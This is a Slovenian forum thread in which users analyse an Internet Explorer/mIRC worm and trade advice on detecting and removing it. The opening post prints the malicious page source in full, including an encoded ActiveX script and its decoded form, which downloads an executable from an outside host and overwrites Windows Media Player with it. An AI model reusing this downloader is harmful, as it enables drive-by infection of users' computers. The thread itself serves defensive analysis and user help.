Za glodanje: nek čuden virus ie/mirc virus

Okej, imamo eno fletno povezavico:

[link sem namenoma pokvaril -- NE ODPIRAJ, preden ne prebereš ostalega!]

Ta stran nam navidezno prikaže neko slikco, v sourcu pa vidimo tole:

<html>
<textarea id="code" style="display:none;">

<html>
<textarea id="code" style="display:none;">

&#118&#97&#114&#32&#120&#32&#61&#32&#110&#101&#119&#32&#65&#99&#116&#105&#118&#101&#88&#79&#98&#106&#101&#99&#116&#40&#34&#77&#105&#99&#114&#111&#115&#111&#102&#116&#46&#88&#77&#76&#72&#84&#84&#80&#34&#41&#59
&#120&#46&#79&#112&#101&#110&#40&#34&#71&#69&#84&#34&#44&#32&#34&#104&#116&#116&#112&#58&#47&#47&#115&#99&#97&#118&#101&#110&#103&#101&#114&#46&#115&#104&#97&#114&#101&#119&#105&#116&#104&#46&#117&#115&#47&#112&#97&#116&#99&#104&#46&#101&#120&#101&#34&#44&#48&#41&#59
&#120&#46&#83&#101&#110&#100&#40&#41&#59
&#118&#97&#114&#32&#115&#32&#61&#32&#110&#101&#119&#32&#65&#99&#116&#105&#118&#101&#88&#79&#98&#106&#101&#99&#116&#40&#34&#65&#68&#79&#68&#66&#46&#83&#116&#114&#101&#97&#109&#34&#41&#59
&#115&#46&#77&#111&#100&#101&#32&#61&#32&#51&#59
&#115&#46&#84&#121&#112&#101&#32&#61&#32&#49&#59
&#115&#46&#79&#112&#101&#110&#40&#41&#59
&#115&#46&#87&#114&#105&#116&#101&#40&#120&#46&#114&#101&#115&#112&#111&#110&#115&#101&#66&#111&#100&#121&#41&#59
&#115&#46&#83&#97&#118&#101&#84&#111&#70&#105&#108&#101&#40&#34&#67&#58&#92&#92&#80&#114&#111&#103&#114&#97&#109&#32&#70&#105&#108&#101&#115&#92&#92&#87&#105&#110&#100&#111&#119&#115&#32&#77&#101&#100&#105&#97&#32&#80&#108&#97&#121&#101&#114&#92&#92&#119&#109&#112&#108&#97&#121&#101&#114&#46&#101&#120&#101&#34&#44&#50&#41&#59
&#108&#111&#99&#97&#116&#105&#111&#110&#46&#104&#114&#101&#102&#32&#61&#32&#34&#109&#109&#115&#58&#47&#47&#34&#59

</textarea>
<img src="newbie.jpg">

<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}


window.open("error.php","_media");

setTimeout("doit()", 5000);

</script>
</html>


</textarea>
<img src="newbie.jpg">

<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}


window.open("error.php","_media");

setTimeout("doit()", 5000);

</script>
</html>

---

Ko uporabnik to stran odpre, po ircu [z uporabo mirca] začne nezavedno širit takole vrstico:

[zopet pokvarjeno]

Če na hitro pogledamo tistole kodo, vidimo, da je nek string malce zakodiran (v bistvu niti ne -- vendar ga more jscript prevest v sebi prežvečljivo obliko, torej odstranit latin/html entitete). Če funkciji prepareCode() na koncu naročimo, naj string izpiše, dobimo tole:

var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http:%2f%2fscavenger.sharewith.us%2fpatch.exe",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);location.href = "mms:%2f%2f";

---

Pozna kdo morda kakšne podrobnosti? Sicer se ravnokar mislim odpravit po netu malce poglodat, vendar bi kakšni hitri napotki, kako pomagat ljudstvu na ircu, vseeno bili koristni :-).

pa ?e mIRCa dol vr?e? pa da? en drug irc klient gor pa je..

heh.. je sme?no in ?alostno hkrati kaj se dogaja..

jaz sem folk, k daje ta link gor banal z kanala.. sami so si krivi, da uporabljajo kar uporabljajo

Poleg klasičnih prevencih, torej neuporaba IEja (in mIrca), očitno pomaga tudi, če ne brskaš kot Administrator, ampak omejen uporabnik [grupa 'users'] -- meni je pomagalo.

Še navodila, ki so se ravno pojavila na #slo-tech kanalu:

"How do I know if I'm infected? How do I get rid of the worm?"
In mIRC, press Alt+R -> List, and see if script.ini is in that list.
If you are using mIRC 6.0 or higher, type /socklist. If "BOT-<some number in the range of 1-99999>" is in the list, the worm is present and working.
Since mIRC will automatically reload script.ini to Remote-section upon starting, /unloading will not be permanent.
system back in 10 min max
Due to this, you should write in mIRC:
//unload -rs script.ini | write -c script.ini | remove script.ini | run command.com /c attrib.exe -r mirc.ini | ignore -r
This will unload the worm from your client, clear&remove it and remove attribute r (read-only) from mirc.ini.
Also, if you have more than one folder with mirc.ini in it, perform a search for script.ini and remove them all (if found).
______________________________________________________________________
that should fix it

Hvala spikey^-u za navodila :).

pa v pi*ko m**erno ... ZAKAJ za vraga folk dela te "viruse" odtrgal bi mu jajca...

ps: nisem kliknu na ta link :)

Mnja, sem bil sm žrtev tega virusa. Rezultat? Formatirat sem mogu particijo in še enkrat naložit Winse.

viiiiiiii, ravno ta trenutek se spet odvija črvo manija na ircu;

Šit... I got screwed too... že iščem zdravilo.

Jst mam ta fajl če ga nuca kdo ki bi ga znal disassemblat... wmplayr.exe
ker mam na c: win98 in je v c:programfiles skopiral ta fajl, zagnal je pa mojga na d: ... tko da če nuca kdo ki zna kej narest s tega... mu lohk pošlem

lp, Andraz

Le zakaj uporabniki Linuxa povečini niso prijavljeni kot uporabnik "root", medtem ko se 99 % uporabnikov Windowsev ceni za "Administratorje".

[Žal je privzet tip računa v WinXP član administratorske skupine. A to ne more bit izgovor.]

Uf, zdajle sem šel *mimo* (jupiii :) pekla!

Je nekdo na IRCu dal link do okužene slike, in jaz seveda kliknem 'joškarico' in odprl z browserjem MyIE2.

Na kanalu #slo-tech je Sergio takoj zagnal paniko, da bo treba format, Gandalf me je malo pomiril itd... ;))

WMPlayer.exe sem dal na read only, mIRC sem uninstaliral in izbrisal njegove fajle. In sedaj mi mašina deluje BP. Pojasnit si ne znam, ampak se ne obremenjujem preveč


Tako, da thx folks za nasvete itd.

JaO, ljudjje men se tud ne pr?ge kista in najraj?i bi kerga oklofotal. Spljoh pa kaksen micro$oft in njegov explorer. Sicer sam uporabljam mozillo, vendat ker mi slike ni in ni hotelo odpreti, sem poskusil se v explorerju.


no, kihc, mes se je isto zgodlo, pol pa sn zagnal spy sweeper, pa mi je računalnik zaštekal, zato sn lepo restartal mašino, in nato mi ni druga ostalo, ko reinstal winsow..samo ne razumem pa, zakaj sem tud ob podatke z druge particije...toti xp-ji so pa res za k*rc
zaj pač vse jovo na novo, kaj pa nea mislim.....

aja, pa še eno vprašanje tak mimogrede...kak se da nastavit tisti firewall na irc skriptah. men ga nikak ne uspe....
lp

Mogoče pa jaz nisem dobil tega virusa ravno zaradi nameščenega FireWall-a1!!??

Zaradi tega se mi tudi mIRC konekta kako minuto dlje!!!

Never underestimate the power of Mozilla.


Mozila sam napiše nek error
--------------------------------------------------
Saj z mozilo ne moreš dobit tega ,kajne?

ce mas nortona ne rabis virusa da ti umori windowse

drugac ti pa ksn pametn virus tut to disejbla.